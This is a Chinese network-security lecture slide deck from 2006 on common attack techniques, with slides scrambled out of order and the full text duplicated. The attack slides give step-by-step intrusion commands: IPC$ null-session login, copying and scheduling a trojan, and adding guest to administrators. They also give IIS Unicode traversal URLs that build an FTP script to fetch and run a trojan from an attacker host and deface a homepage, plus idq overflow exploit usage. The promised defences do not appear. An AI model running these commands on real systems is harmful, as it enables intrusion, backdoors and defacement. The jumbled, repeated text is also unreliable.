网络常见攻击技术及防御措施
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
7
入侵行为- 社会工程学
真实案例一
–
一位安全专家只花了几个小时就完全控制了一家大 公司的网络,他所需要作的仅仅是打了几个电话, 他是如何作到?
真实案例二
–
凯文.米特尼克最擅长的是什么?
WindowNT用户口令破解 – 典型工具:l0pht的nt口令破解工具
*号密码查看 – 简单编程实现 联众、QQ密码窃取 – 重画登陆窗口
网络安全技术讲座©2006
9
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-口令攻击示意
ID:scn psw:123456 Ok,you can login in
3
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
信息收集 - 探测扫描 – (2)
国产优秀漏洞扫描器
–
– X-scanner
扫描报告示例
网络安全技术讲座©2006
4
上海三零卫士信息安全有限公司 30wish Information Security
信息收集- 探测扫描 – (3)
漏洞扫描利器
–
– nessus
扫描报告示例
网络安全技术讲座©2006
5
上海三零卫士信息安全有限公司 30wish Information Security
信息收集- 探测扫描 – (4)
极好的探测工具
- nmap
网络安全技术讲座©2006
6
上海三零卫士信息安全有限公司 30wish Information Security
前提
–
例如:使用X-scanner扫描到某Win2K主机允许空连接,且共享 IPC$,管理员administrator口令为password
目的
–
在目标主机上运行木马程序以完全控制该主机
13
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
网络常见攻击技术及 防御措施
沈传宁
shencn@30san.net
上海三零卫士信息安全有限公司
计算机网络攻防技术 直奔主题
完整的攻击行为
– – – –
踩点(信息收集) 入侵 留后门 抹去痕迹
防范技术
–
针对以上提到的攻击行为提出防范措施
网络安全技术讲座©2006
1
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
21
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-钓鱼式攻击
恶意代码:
信息收集-探测扫描 – (1)
扫描是“一切入侵的基础”
– – – –
Hale Waihona Puke Baidu
获取对方操作系统信息 获取对方主机开放服务信息 获知对方可能存在的漏洞 获取对方主机用户列表
常用扫描工具
– –
漏洞扫描工具 nessus、X-scanner、ISS、Retina 探测扫描工具 nmap、supperscan
网络安全技术讲座©2006
11
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-拒绝服务攻击
利用协议漏洞
利用网络漏洞进行攻击 利用系统漏洞进行攻击 利用服务漏洞进行攻击 大流量洪水攻击
网络安全技术讲座©2006
12
上海三零卫士信息安全有限公司 30wish Information Security
入侵实例 – IPC$
攻击步骤
–
– – – –
建立连接
C:\>net use \\127.0.0.1\IPC$ "" /user:admintitrator
拷贝木马服务器端
C:\>copy srv.exe \\127.0.0.1\admin$
查看对方时间
C:\>net time \\127.0.0.1
网络安全技术讲座©2006
16
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-缓存溢出攻击(.idq缓存溢出攻击)
漏洞描述
–
微软IIS默认安装情况下带了一个索引服务器(Index Server ,在Windows 2000下为"Index Service")。默认安装时,IIS 支持两种脚本映射:管理脚本(.ida文件)、Internet数据查 询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展 idq.dll来处理和解释。
如果系统包含某个可执行目录,就可能执行任意系统命令。 下面的URL可能列出当前目录的内容:
漏洞利用
–
–
http://202.116.33.27/scripts/../../winnt/system32/cmd.exe?/c +dir 利用这个漏洞查看系统文件内容也是可能的:
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/w in.ini
源径路由欺骗
网络安全技术讲座©2006
19
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-钓鱼式攻击
通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾 邮件,恶意网页、网络游戏、伪造的WEB站点、日常性支付行 为的知名互联网商务网站 ,意图引诱收信人给出敏感信息( 如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息 )的一种攻击方式。
网络安全技术讲座©2006
15
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为- UNICODE攻击
攻击步骤
–
–
拷贝cmd.exe至scripts目录
写入ftp批处理文件
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\ winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe http://x.x.x.x/scripts/ccc.exe?/c+echo+open+*.*.*.*>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+user>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+pass>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+get+srv.exe>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+bye>>hacker.txt
目的:
获取个人帐户信息以得到经济利益。
网络安全技术讲座©2006
20
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-钓鱼式攻击
假冒网络银行、网站
伪造网站:
建立起域名和网页内容都与真正网上银行系统、网上证券交易平台 极为相似的网站,引诱用户输入账号密码等信息,进而通过真正的 网上银行、网上证券系统或者伪 造银行储蓄卡、证券交易卡盗窃 资金。 http://www.1cbc.com.cn http://www.bigbank.com http://www.bigbnk.com
网络安全技术讲座©2006 17
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为 – .ida/.idq溢出攻击
攻击步骤
– –
傻瓜式的攻击,使用溢出利用程序idq.c 编译之后,在命令控制台中运行 运行步骤如下 C:\>idq.exe <溢出的主机> <主机补丁> 之后telnet 目的主机的溢出端口,便得到system权 限的控制台
真实案例三
–
一个大公司的网管犯的错误?
8
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
入侵行为– 口令破解
电子邮件口令破解 – Pop3信箱口令暴力破解 网页表单破解 – 同样属暴力破解,单位时间内重复提交表单,比较返回结果
定时启动木马服务器端
C:\>at \\127.0.0.1 11:05 srv.exe
–
–
连接木马 新建用户hacker
C:\> net user guest /active:yes
将用户加入管理员组
C:\>net localgroup administrators guest /add
网络安全技术讲座©2006
idq.dll实现上存在一个缓冲区溢出漏洞,远程攻击者可以利用 此漏洞通过溢出攻击以“Local System”的权限在主机上执行 任意指令。 由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区 ,如果攻击者提供一个特殊格式的URL,就可能引发一个缓 冲区溢出。通过精心构造发送数据,攻击者可以改变程序执 行流程,以“Local System”的权限执行任意代码。
14
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-利用服务漏洞(UNICODE)
UNICODE漏洞介绍
–
–
微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安 全漏洞,导致用户可以远程通过IIS执行任意命令 当IIS打开文件时,如果该文件名包含unicode字符,它会对 其进行解码,如果用户提供一些特殊的编码,将导致IIS错误 的打开或者执行某些web根目录以外的文件
信息收集-正式渠道(媒体)
网站信息
–
举例:某网络提供商在其网站上宣传 “特惠服务器租用:RedHat Linux 8.0 支持MY SQL/PHP 采用性能优异的Apache 1.3.XX Web服 务器”
搜索引擎
–
Google搜索 例:某Web服务器存在致命错误脚本“5sf67.jsp” 攻击者可通过搜索引擎查找存在该错误脚本的网站
–
其他类似的攻击还有IIS5Hack.exe等
–
其利用了IIS 5.0 .printer ISAPI扩展远程缓冲溢出漏 洞
18
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
入侵行为-电子欺骗
IP欺骗
TCP劫持 ARP欺骗
DNS欺骗
ID:scn
psw: 12 123456 12345 1234 123
No,you can not login in OK,you can login in
网络安全技术讲座©2006
10
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为– 口令破解工具
工具举例
– – – –
运行该批处理文件
http://x.x.x.x/scripts/ccc.exe?/c+ftp+-s:hacker.txt
执行下载的文件(木马服务器端)
http://x.x.x.x/scripts/ccc.exe?/c+srv.exe
木马客户端连接 或者修改其主页
http://x.x.x.x/scripts/ccc.exe?/c+echo+hacked by hahaha >c:\inetpub\wwwroot\index.html
攻击前奏- 踩点
踩点的目的
–
获取对方大概信息
主机信息 是否存在漏洞 密码脆弱性等等
–
指导下一步攻击行为
踩点的方式
– – –
专用漏洞扫描工具 正式渠道:媒体(如搜索引擎、广告介绍等) 社会工程学
2
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
入侵行为- 利用系统漏洞( IPC$)
IPC$是什么
–
ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理 而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻 辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一 定有好的收效,一些别有用心者会利用IPC$,访问共享资源,导 出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得 更高的权限,从而达到不可告人的目的.
网络安全技术讲座©2006
7
入侵行为- 社会工程学
真实案例一
–
一位安全专家只花了几个小时就完全控制了一家大 公司的网络,他所需要作的仅仅是打了几个电话, 他是如何作到?
真实案例二
–
凯文.米特尼克最擅长的是什么?
WindowNT用户口令破解 – 典型工具:l0pht的nt口令破解工具
*号密码查看 – 简单编程实现 联众、QQ密码窃取 – 重画登陆窗口
网络安全技术讲座©2006
9
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-口令攻击示意
ID:scn psw:123456 Ok,you can login in
3
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
信息收集 - 探测扫描 – (2)
国产优秀漏洞扫描器
–
– X-scanner
扫描报告示例
网络安全技术讲座©2006
4
上海三零卫士信息安全有限公司 30wish Information Security
信息收集- 探测扫描 – (3)
漏洞扫描利器
–
– nessus
扫描报告示例
网络安全技术讲座©2006
5
上海三零卫士信息安全有限公司 30wish Information Security
信息收集- 探测扫描 – (4)
极好的探测工具
- nmap
网络安全技术讲座©2006
6
上海三零卫士信息安全有限公司 30wish Information Security
前提
–
例如:使用X-scanner扫描到某Win2K主机允许空连接,且共享 IPC$,管理员administrator口令为password
目的
–
在目标主机上运行木马程序以完全控制该主机
13
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
网络常见攻击技术及 防御措施
沈传宁
shencn@30san.net
上海三零卫士信息安全有限公司
计算机网络攻防技术 直奔主题
完整的攻击行为
– – – –
踩点(信息收集) 入侵 留后门 抹去痕迹
防范技术
–
针对以上提到的攻击行为提出防范措施
网络安全技术讲座©2006
1
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
21
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-钓鱼式攻击
恶意代码:
信息收集-探测扫描 – (1)
扫描是“一切入侵的基础”
– – – –
Hale Waihona Puke Baidu
获取对方操作系统信息 获取对方主机开放服务信息 获知对方可能存在的漏洞 获取对方主机用户列表
常用扫描工具
– –
漏洞扫描工具 nessus、X-scanner、ISS、Retina 探测扫描工具 nmap、supperscan
网络安全技术讲座©2006
11
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-拒绝服务攻击
利用协议漏洞
利用网络漏洞进行攻击 利用系统漏洞进行攻击 利用服务漏洞进行攻击 大流量洪水攻击
网络安全技术讲座©2006
12
上海三零卫士信息安全有限公司 30wish Information Security
入侵实例 – IPC$
攻击步骤
–
– – – –
建立连接
C:\>net use \\127.0.0.1\IPC$ "" /user:admintitrator
拷贝木马服务器端
C:\>copy srv.exe \\127.0.0.1\admin$
查看对方时间
C:\>net time \\127.0.0.1
网络安全技术讲座©2006
16
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-缓存溢出攻击(.idq缓存溢出攻击)
漏洞描述
–
微软IIS默认安装情况下带了一个索引服务器(Index Server ,在Windows 2000下为"Index Service")。默认安装时,IIS 支持两种脚本映射:管理脚本(.ida文件)、Internet数据查 询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展 idq.dll来处理和解释。
如果系统包含某个可执行目录,就可能执行任意系统命令。 下面的URL可能列出当前目录的内容:
漏洞利用
–
–
http://202.116.33.27/scripts/../../winnt/system32/cmd.exe?/c +dir 利用这个漏洞查看系统文件内容也是可能的:
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/w in.ini
源径路由欺骗
网络安全技术讲座©2006
19
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-钓鱼式攻击
通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾 邮件,恶意网页、网络游戏、伪造的WEB站点、日常性支付行 为的知名互联网商务网站 ,意图引诱收信人给出敏感信息( 如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息 )的一种攻击方式。
网络安全技术讲座©2006
15
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为- UNICODE攻击
攻击步骤
–
–
拷贝cmd.exe至scripts目录
写入ftp批处理文件
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\ winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe http://x.x.x.x/scripts/ccc.exe?/c+echo+open+*.*.*.*>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+user>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+pass>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+get+srv.exe>>hacker.txt http://x.x.x.x/scripts/ccc.exe?/c+echo+bye>>hacker.txt
目的:
获取个人帐户信息以得到经济利益。
网络安全技术讲座©2006
20
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-钓鱼式攻击
假冒网络银行、网站
伪造网站:
建立起域名和网页内容都与真正网上银行系统、网上证券交易平台 极为相似的网站,引诱用户输入账号密码等信息,进而通过真正的 网上银行、网上证券系统或者伪 造银行储蓄卡、证券交易卡盗窃 资金。 http://www.1cbc.com.cn http://www.bigbank.com http://www.bigbnk.com
网络安全技术讲座©2006 17
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为 – .ida/.idq溢出攻击
攻击步骤
– –
傻瓜式的攻击,使用溢出利用程序idq.c 编译之后,在命令控制台中运行 运行步骤如下 C:\>idq.exe <溢出的主机> <主机补丁> 之后telnet 目的主机的溢出端口,便得到system权 限的控制台
真实案例三
–
一个大公司的网管犯的错误?
8
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
入侵行为– 口令破解
电子邮件口令破解 – Pop3信箱口令暴力破解 网页表单破解 – 同样属暴力破解,单位时间内重复提交表单,比较返回结果
定时启动木马服务器端
C:\>at \\127.0.0.1 11:05 srv.exe
–
–
连接木马 新建用户hacker
C:\> net user guest /active:yes
将用户加入管理员组
C:\>net localgroup administrators guest /add
网络安全技术讲座©2006
idq.dll实现上存在一个缓冲区溢出漏洞,远程攻击者可以利用 此漏洞通过溢出攻击以“Local System”的权限在主机上执行 任意指令。 由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区 ,如果攻击者提供一个特殊格式的URL,就可能引发一个缓 冲区溢出。通过精心构造发送数据,攻击者可以改变程序执 行流程,以“Local System”的权限执行任意代码。
14
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为-利用服务漏洞(UNICODE)
UNICODE漏洞介绍
–
–
微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安 全漏洞,导致用户可以远程通过IIS执行任意命令 当IIS打开文件时,如果该文件名包含unicode字符,它会对 其进行解码,如果用户提供一些特殊的编码,将导致IIS错误 的打开或者执行某些web根目录以外的文件
信息收集-正式渠道(媒体)
网站信息
–
举例:某网络提供商在其网站上宣传 “特惠服务器租用:RedHat Linux 8.0 支持MY SQL/PHP 采用性能优异的Apache 1.3.XX Web服 务器”
搜索引擎
–
Google搜索 例:某Web服务器存在致命错误脚本“5sf67.jsp” 攻击者可通过搜索引擎查找存在该错误脚本的网站
–
其他类似的攻击还有IIS5Hack.exe等
–
其利用了IIS 5.0 .printer ISAPI扩展远程缓冲溢出漏 洞
18
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
入侵行为-电子欺骗
IP欺骗
TCP劫持 ARP欺骗
DNS欺骗
ID:scn
psw: 12 123456 12345 1234 123
No,you can not login in OK,you can login in
网络安全技术讲座©2006
10
上海三零卫士信息安全有限公司 30wish Information Security
入侵行为– 口令破解工具
工具举例
– – – –
运行该批处理文件
http://x.x.x.x/scripts/ccc.exe?/c+ftp+-s:hacker.txt
执行下载的文件(木马服务器端)
http://x.x.x.x/scripts/ccc.exe?/c+srv.exe
木马客户端连接 或者修改其主页
http://x.x.x.x/scripts/ccc.exe?/c+echo+hacked by hahaha >c:\inetpub\wwwroot\index.html
攻击前奏- 踩点
踩点的目的
–
获取对方大概信息
主机信息 是否存在漏洞 密码脆弱性等等
–
指导下一步攻击行为
踩点的方式
– – –
专用漏洞扫描工具 正式渠道:媒体(如搜索引擎、广告介绍等) 社会工程学
2
上海三零卫士信息安全有限公司 30wish Information Security
网络安全技术讲座©2006
入侵行为- 利用系统漏洞( IPC$)
IPC$是什么
–
ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理 而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻 辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一 定有好的收效,一些别有用心者会利用IPC$,访问共享资源,导 出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得 更高的权限,从而达到不可告人的目的.